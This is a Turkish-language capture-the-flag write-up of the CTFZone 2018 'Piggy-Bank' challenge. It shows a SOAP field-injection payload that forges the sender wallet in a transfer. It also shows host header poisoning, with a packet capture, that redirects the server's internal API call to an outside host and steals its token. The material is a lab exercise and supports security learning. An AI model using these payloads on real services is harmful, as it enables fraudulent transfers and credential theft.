date:

Piggy-Bank - CTFZone 2018


1
2
3
Hack some bank for me.

http://web-05.v7frkwrfyhsjtbpfcppnu.ctfz.one/home/

Linke gidildigine karsimiza Piggy-Bank adinda bir banka cikiyor.

Uye olundugunda For developers adinda daha aktif olmayan bir karsimiza cikiyor.

Fakat kaynak kodunda assagidaki ifadeleri gozlemleyebiliyoruz.

1
2
3
  <div class="tab tab_5">Especially for pig-developers, we have the coolest api, which they will soon be able to use!</div>
<!-- Link to the API (http://web-05.v7frkwrfyhsjtbpfcppnu.ctfz.one/api/bankservice.wsdl.php) (Testing stage) -->
</div>

Bahsi gecen WSDL sayfasina gidilince assagidaki WSDL formu karsimiza cikti.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
<?xml version="1.0" encoding="utf-8"?>
<wsdl:definitions name="Bank"
targetNamespace="urn:Bank"
xmlns:tns="urn:Bank"
xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/"
xmlns="http://schemas.xmlsoap.org/wsdl/">
<message name="BalanceRequest">
<part name="wallet_num" type="xsd:decimal"/>
</message>
<message name="BalanceResponse">
<part name="code" type="xsd:float"/>
<part name="status" type="xsd:string"/>
</message>
<message name="internalTransferRequest">
<part name="receiver_wallet_num" type="xsd:decimal"/>
<part name="sender_wallet_num" type="xsd:decimal"/>
<part name="amount" type="xsd:float"/>
<part name="token" type="xsd:string"/>
</message>
<message name="internalTransferResponse">
<part name="code" type="xsd:float"/>
<part name="status" type="xsd:string"/>
</message>
<portType name="BankServicePort">
<operation name="requestBalance">
<input message="tns:BalanceRequest"/>
<output message="tns:BalanceResponse"/>
</operation>
<operation name="internalTransfer">
<input message="tns:internalTransferRequest"/>
<output message="tns:internalTransferResponse"/>
</operation>
</portType>
<binding name="BankServiceBinding" type="tns:BankServicePort">
<soap:binding style="rpc" transport="http://schemas.xmlsoap.org/soap/http"/>
<operation name="requestBalance">
<soap:operation soapAction="urn:requestBalanceAction"/>
<input>
<soap:body use="encoded" namespace="urn:Bank" encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"/>
</input>
<output>
<soap:body use="encoded" namespace="urn:Bank" encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"/>
</output>
</operation>
<operation name="internalTransfer">
<soap:operation soapAction="urn:internalTransferAction"/>
<input>
<soap:body use="encoded" namespace="urn:Bank" encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"/>
</input>
<output>
<soap:body use="encoded" namespace="urn:Bank" encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"/>
</output>
</operation>
</binding>
<wsdl:service name="BankService">
<wsdl:port name="BankServicePort" binding="tns:BankServiceBinding">
<soap:address location="http://web-05.v7frkwrfyhsjtbpfcppnu.ctfz.one/api/bankservice.php" />
</wsdl:port>
</wsdl:service>
</wsdl:definitions>

Buna forma gore iki adet SOAP API endpointine sahip oldugumuzu ogrendik.

Ilki bakiye sorgulama

1
2
3
4
5
6
7
8
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:Bank">
<soapenv:Header/>
<soapenv:Body>
<urn:requestBalance soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<wallet_num xsi:type="xsd:decimal">hesapNo</wallet_num>
</urn:requestBalance>
</soapenv:Body>
</soapenv:Envelope>

İkincisi ise bakiye yollama

1
2
3
4
5
6
7
8
9
10
11
 <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:Bank">
<soapenv:Header/>
<soapenv:Body>
<urn:internalTransfer soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<receiver_wallet_num xsi:type="xsd:decimal">aliciHesapNo</receiver_wallet_num>
<sender_wallet_num xsi:type="xsd:decimal">fonderenHesapNo</sender_wallet_num>
<amount xsi:type="xsd:float">miktar</amount>
<token xsi:type="xsd:string">token</token>
</urn:internalTransfer>
</soapenv:Body>
</soapenv:Envelope>

Ilk kosul(bakiye yollama) icin api token’e ihtiyac duyuyoruz. Buyuk ihtimal sorunun cozumu de bununla alakali olacagindan dolayi bunu kurcalamayabiliriz.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST /home/transfer.php HTTP/1.1
Host: web-05.v7frkwrfyhsjtbpfcppnu.ctfz.one
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://web-05.v7frkwrfyhsjtbpfcppnu.ctfz.one/home/transfer.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 24
Cookie: PHPSESSID=xxx
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

receiver=1828&amount=123

Istekte giden parametreler arasinda receiver ve amount olmasi bir once gordugumuz bakiye yollama endpointi ile tutuyordu. Bundan dolayi SOAP injection denenebilir.

Çözüm 1: SOAP injection

Aklimizda olsuturdugumuz hedeflenen injection assagida gorunmektedir:

1
2
3
4
5
6
<receiver_wallet_num xsi:type="xsd:decimal">1828</receiver_wallet_num>
<sender_wallet_num xsi:type="xsd:decimal">1</sender_wallet_num>
<amount xsi:type="xsd:float"><!--</receiver_wallet_num>
<sender_wallet_num xsi:type="xsd:decimal">1000</sender_wallet_num>
<amount xsi:type="xsd:float">-->1000</amount>
<token xsi:type="xsd:string">token</token>

receiver kısmına;

1
2
3
hesapNumaram </receiver_wallet_num>
<sender_wallet_num xsi:type="xsd:decimal">1</sender_wallet_num>
<amount xsi:type="xsd:float"><!--

amount kısmına ise;

1
--> 200

Fakat nedense hesabimiza paralar yuklenmedi. Sonra dusununce hedefte yeterince para olmayabilir. Bundan dolayi belli bir aralikta ki herkesin bakiyesini calmaya calistik.

Çözüm 2: Host header poisoning

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST /home/transfer.php HTTP/1.1
Host: web-05.v7frkwrfyhsjtbpfcppnu.ctfz.one
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://web-05.v7frkwrfyhsjtbpfcppnu.ctfz.one/home/transfer.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 24
Cookie: PHPSESSID=xxx
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

receiver=1828&amount=123

Alakali istekte host header injection oldugunu farkettik. Boylece endpointi zehirleyip api istegindeki tokeni calabiliriz.

1
ngrep -q -d ens160 -W byline port 80
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
[email protected]:~# ngrep -q -d ens160 -W byline port 80
interface: ens160 (x.x.x.x/255.255.255.224)
filter: (ip or ip6) and ( port 80 )

T 162.158.89.120:10101 -> my.ip.v4.addr:80 [A]
......

T 162.158.89.120:10101 -> my.ip.v4.addr:80 [AP]
GET /api/bankservice.wsdl.php HTTP/1.1.
Host: cd0.me.
Connection: Keep-Alive.
Accept-Encoding: gzip.
CF-IPCountry: DE.
X-Forwarded-For: 18.184.147.62.
CF-RAY: 43ecd60df1ef63a3-FRA.
X-Forwarded-Proto: http.
CF-Visitor: {"scheme":"http"}.
CF-Connecting-IP: 18.184.147.62.
.


T my.ip.v4.addr:80 -> 162.158.89.120:10101 [A]
HTTP/1.1 200 OK.
Date: Mon, 23 Jul 2018 08:39:22 GMT.
Server: Apache/2.4.18 (Ubuntu).
Last-Modified: Mon, 23 Jul 2018 07:31:21 GMT.
ETag: "b5b-571a5a1ce14ac".
Accept-Ranges: bytes.
Content-Length: 2907.
Keep-Alive: timeout=5, max=100.
Connection: Keep-Alive.
.
<?xml version="1.0" encoding="utf-8"?><wsdl:definitions name="Bank"
targetNamespace="urn:Bank"
xmlns:tns="urn:Bank"
xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/"
xmlns="http://schemas.xmlsoap.org/wsdl/">

<message name="BalanceRequest">
<part name="wallet_num" type="xsd:decimal"/>
</message>

<message name="BalanceResponse">
<part name="code" type="xsd:float"/>
<part name="status" type="xsd:string"/>
</message>

<message name="internalTransferRequest">
<part name="receiver_wallet_num" type="xsd:decimal"/>
<part name="sender_wallet_num" type="xsd:decimal"/>
<part name="amount" type="xsd:float"/>
<part name="token" type="xsd:string"/>
</message>

<message name="internalTransferResponse">
<part name="code" type="xsd:float"/>
<part name="status" type="xsd:string"/>
</message>

<portType name="BankServicePort">
<operation name="requestBalance">
<input message="tns:BalanceRequest"/>
<output message="tns:BalanceResponse"/>
</operation>
<operation name="internalTransfer">
<input message="tns:internalTransferRequest"/>
<output message="tns:internalTransferResponse"/>
</operation>
</portType>

<binding name="BankServiceBinding" type="tns:BankServicePort">
<soap:binding style="rpc" transport="http://schemas.xmlsoap.org/soap/http"/>
<operation name="requestBalance">
<soap:operation soapAction="urn:requestBalanceAction"/>
<input>
<soap:body use="encoded" namespace="urn:Bank" encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"/>
</input>
<output>
<soap:body use="encoded" namespace="urn:Bank" encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"/>
</output>
</operation>
<operation name="internalTransfer">
<soap:operation soapAction="urn:internalTransferAction"/>
<input>
<soap:body use="encoded" namespace="urn:Bank" encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"/>
</input>
<output>
<soap:body use="encoded" namespace="urn:Bank" encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"/>
</output>
</operation>
</binding>

<wsdl:service name="BankSer

T my.ip.v4.addr:80 -> 162.158.89.120:10101 [AP]
vice">
<wsdl:port name="BankServicePort" binding="tns:BankServiceBinding">
<soap:address location="http://web-05.v7frkwrfyhsjtbpfcppnu.ctfz.one/api/bankservice.php" />
</wsdl:port>
</wsdl:service>
</wsdl:definitions>

T 162.158.89.120:10101 -> my.ip.v4.addr:80 [A]
......

T 162.158.89.120:10101 -> my.ip.v4.addr:80 [A]
......

T 162.158.89.120:10101 -> my.ip.v4.addr:80 [A]
......

T 162.158.89.252:15529 -> my.ip.v4.addr:80 [A]
......

T 162.158.89.252:15529 -> my.ip.v4.addr:80 [AP]
POST /api/bankservice.php HTTP/1.1.
Host: cd0.me.
Connection: Keep-Alive.
Accept-Encoding: gzip.
CF-IPCountry: DE.
X-Forwarded-For: 18.184.147.62.
CF-RAY: 43ecd60eb012268a-FRA.
Content-Length: 736.
X-Forwarded-Proto: http.
CF-Visitor: {"scheme":"http"}.
User-Agent: PHP-SOAP/7.0.30-0ubuntu0.16.04.1.
Content-Type: application/soap+xml; charset=utf-8; action="internalTransferAction".
CF-Connecting-IP: 18.184.147.62.
.
<SOAP-ENV:Envelope SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="urn:Bank" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<SOAP-ENV:Body>
<ns1:internalTransfer>
<receiver_wallet_num xsi:type="xsd:decimal">1340</receiver_wallet_num>
<sender_wallet_num xsi:type="xsd:decimal">1349</sender_wallet_num>
<amount xsi:type="xsd:float">1</amount>
<token xsi:type="xsd:token">somesupertokenkey1235555</token>
</ns1:internalTransfer>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>

T my.ip.v4.addr:80 -> 162.158.89.252:15529 [AP]
HTTP/1.1 404 Not Found.
Date: Mon, 23 Jul 2018 08:39:22 GMT.
Server: Apache/2.4.18 (Ubuntu).
Content-Length: 289.
Keep-Alive: timeout=5, max=100.
Connection: Keep-Alive.
Content-Type: text/html; charset=iso-8859-1.
.
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /api/bankservice.php was not found on this server.</p>
<hr>
<address>Apache/2.4.18 (Ubuntu) Server at cd0.me Port 80</address>
</body></html>


T 162.158.89.252:15529 -> my.ip.v4.addr:80 [A]
......

T 162.158.89.120:10101 -> my.ip.v4.addr:80 [AF]
......

T 162.158.89.252:15529 -> my.ip.v4.addr:80 [AF]
1
2
3
4
5
6
7
8
9
10
<SOAP-ENV:Envelope SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="urn:Bank" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<SOAP-ENV:Body>
<ns1:internalTransfer>
<receiver_wallet_num xsi:type="xsd:decimal">1340</receiver_wallet_num>
<sender_wallet_num xsi:type="xsd:decimal">1349</sender_wallet_num>
<amount xsi:type="xsd:float">1</amount>
<token xsi:type="xsd:token">somesupertokenkey1235555</token>
</ns1:internalTransfer>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>

hostu zehirledigimizden mutevellit api istegi bize geri dondu. boyleci token expose edilmis oldu somesupertokenkey1235555

ve flag

1
ctfzone{dcaa1f2047501ac0f4ae6f448082e63e}

← Prev MMORPG3000 - CTFZone 2018 | Image Share Box - CTFZone 2018 Next →